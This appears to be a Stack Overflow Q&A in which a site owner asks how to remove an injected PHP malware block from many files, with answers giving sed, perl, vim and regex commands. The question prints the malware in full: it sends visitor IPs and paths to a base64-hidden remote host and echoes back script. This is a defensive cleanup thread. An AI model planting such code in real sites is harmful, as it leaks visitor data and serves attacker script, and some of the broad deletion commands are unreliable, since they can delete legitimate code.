# how to remove block of code in source files

Tags: php, sed, malware

i have a big problem with malware on my server. Somehow a bot was able to put code in more than 100 php files, which does a curl retrieve to execute JS code on a viewers browser.
Fortunately the server to which this code connects to is dead. So no i have dead malware code in my php files. I want to remove that block of code from each php file.

The following code block is in many php files:

```
?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>
```

As you can see the first characters begin with "?>.

Using sed i would do something like:

```
sed -i 's/<\?php\nif \(\!isset\(\$sRetry\)\)(.*?)\n\}\n}\?>//g' *.php
```

Obviously this is not working. But what im trying to do is to search for the opening tag include the "isset" check for $sRetry to be sure it only finds this code block, then followed by (.*) for any code followed by the two braces and the ending tag.

Could anybody provide me proper regex or tell me what is wrong on this one?

Comment: Or just re-upload the originals via FTP etc.. AND FIX THE HOLE

Comment: Don't check remember password in FTP client while connecting to server to avoid this kind of issues..

Answer (score 0):

```
perl -i -lne 'print unless(/\?\>\<\?php/.../\?\>$/)' *.php
```

Answer (score 0):

Would this be enough:

```
sed -e '/?><?php/,/?>/d' your_file.php
```

If you want to test the 2nd line in addition to the 1st, you could do:

```
sed -e '/?><?php/N;/?><?php\nif (!isset(\$sRetry))/,/?>/d' your_file.php
```

Comment: @Asenar: yes I am, try it and you will see by yourself.

Comment: A friend of me got the exact same virus and this was my 1st idea, but sed didn't worked, so I proposed him to use vim.

Answer (score 0):

This can solve your problem for one file :

```
`vim -e +':%s#<?php\nif (!isset(\$sRetry\_.\{-}?>##' +wq yourfile.php `
```

if you have the list of infected file in infected.list 'make a search to , do that :

```
for i in $(cat infected.list); do 
    vim -e +':%s#<?php\nif (!isset(\$sRetry\_.\{-}?>##' +wq $i
done;
```

Answer (score 0):

On the whole file:

/^(.*)(<\?php.*?\\$sRetry.*?\?>)(.*)$/mis

Take match 1 and match 3 and glue them back together.  Works like a charm.